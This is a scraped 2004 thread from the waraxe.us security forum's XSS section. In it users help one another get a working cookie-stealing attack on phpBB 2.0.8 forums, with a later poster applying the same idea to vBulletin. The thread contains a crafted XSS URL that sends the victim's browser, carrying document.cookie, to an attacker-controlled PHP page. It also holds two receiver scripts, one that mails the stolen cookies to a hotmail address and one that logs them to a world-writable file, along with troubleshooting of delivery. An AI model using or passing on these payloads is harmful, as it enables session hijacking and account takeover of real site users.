Waraxe IT Security Portal
Login or Register
June 17, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 53
Members: 0
Total: 53
Full disclosure
SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version
Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Local information disclosure in apport and systemd-coredump
Stored XSS via File Upload - adaptcmsv3.0.3
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Authenticated File Upload to RCE - adaptcmsv3.0.3
Stored XSS in "Description" Functionality - cubecartv6.5.9
Multiple Vulnerabilities in SAP GuiXT Scripting
CVE-2024-47081: Netrc credential leak in PSF requests library
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS phpBB 2.0.8
Post new topicReply to topic View previous topic :: View next topic
XSS phpBB 2.0.8
PostPosted: Sun Sep 19, 2004 12:34 am Reply with quote
Nicolas
Regular user
Regular user
Joined: Sep 19, 2004
Posts: 10




Hi All
Thx for your forum, it's very good Wink

I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034


I write this link:

Code:
http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil


and my code_evil.php is:
Code:
<?php

$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);

?>


But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please Idea
View user's profile Send private message
PostPosted: Sun Sep 19, 2004 2:33 am Reply with quote
Dark Dragon
Regular user
Regular user
Joined: Aug 26, 2004
Posts: 11




i don't like emailer scripts personnaly

id prefer


Code:

<?php
$fp = fopen('logger.txt','a'); // open to append
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>


and logger.txt (chmodded 777)

_________________
Coding Support Central
View user's profile Send private message
PostPosted: Sun Sep 19, 2004 7:09 pm Reply with quote
Nicolas
Regular user
Regular user
Joined: Sep 19, 2004
Posts: 10




Thx for your script, it's nice methode Wink

But did you know why my script don't work ?
View user's profile Send private message
Re: XSS phpBB 2.0.8
PostPosted: Sun Sep 19, 2004 8:25 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Nicolas wrote:
Hi All
Thx for your forum, it's very good Wink

I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034


I write this link:

Code:
http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil


and my code_evil.php is:
Code:
<?php

$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);

?>


But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please Idea


You don't receive email at all, or you receive email without cookie?
If you don't get email at all, then there can be problem with spam
filters and it's related to server, in which you use "mail()" function.
I have encountered many servers, that are "banned" from hotmail.com
and mails are just not getting through ...
View user's profile Send private message Send e-mail Visit poster's website
aa
PostPosted: Mon Sep 20, 2004 8:45 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




Always check your Junk E-Mail.. Wink

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Wed Sep 22, 2004 3:23 pm Reply with quote
Nicolas
Regular user
Regular user
Joined: Sep 19, 2004
Posts: 10




I didn't receive emails and I thank again the problem is a filters problem not a code problem
The email to receive is hotmail
I will test with an other email
Thx for all
I will post my results Wink
View user's profile Send private message
PostPosted: Sun Jan 16, 2005 7:24 pm Reply with quote
Injector
Active user
Active user
Joined: Dec 29, 2004
Posts: 49




hey can anyone help me Im having the same problem I used the php script
which sends the cookie to your email address. I receive the cookie but its
empty though. what did i do wrong or do i have to add anything else?

I'm doing it on vbulletin using some exploit on [IMG tags
View user's profile Send private message
XSS phpBB 2.0.8
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.028 Seconds